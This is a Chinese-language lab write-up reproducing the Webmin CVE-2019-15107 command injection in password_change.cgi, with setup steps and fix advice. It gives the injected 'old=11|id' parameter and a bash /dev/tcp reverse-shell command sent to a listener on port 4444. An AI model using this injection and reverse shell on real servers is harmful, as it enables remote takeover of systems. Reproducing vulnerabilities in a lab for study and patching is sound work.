漏洞简介
webmin是一款强大的Unix系统管理工具,在其版本为1.882到1.920存在CVE-2019-15107漏洞,当版本为1.890时,工具在默认配置下易受漏洞的威胁,而在其它版本当用户关闭密码过期策略时,受漏洞威胁的概率较小,漏洞主要是起代码中引用‘qx/ /’方法,把密码字符串当作命令执行
漏洞环境搭建
Webmin 1.920
kali执行终端命令:wget https://sourceforge.net/projects/webadmin/files/webmin/1.920/webmin_1.920_all.deb/download
或者从vulhub中直接拉取镜像(webmin1.910)
3.1.2.4 漏洞复现
安装webmin1.920,并从其给的提示修改初始密码并登录
设置为允许修改新密码
浏览器里打开password_change.cgi,发现提示外部url,并且给出修改提示。
按提示修改
打开burp抓包(webmin的password_change.cgi界面),把抓到的包修改为修改密码的请求包发送到repeater
尝试反弹shell
将命令 bash -c “bash -i >& /dev/tcp/192.168.202.128/4444 0>&1” 进行url编码
将编码后的数字换到“old=11|id”中的id,然后打开kali监听4444端口,回到burp重新,发送请求包
成功返弹shell
至此漏洞复现成功
3.1.2.5 修复建议
(1).找到漏洞代码,将,qx/$in{‘old’}/)代码删除
(2)下载最新版本webmin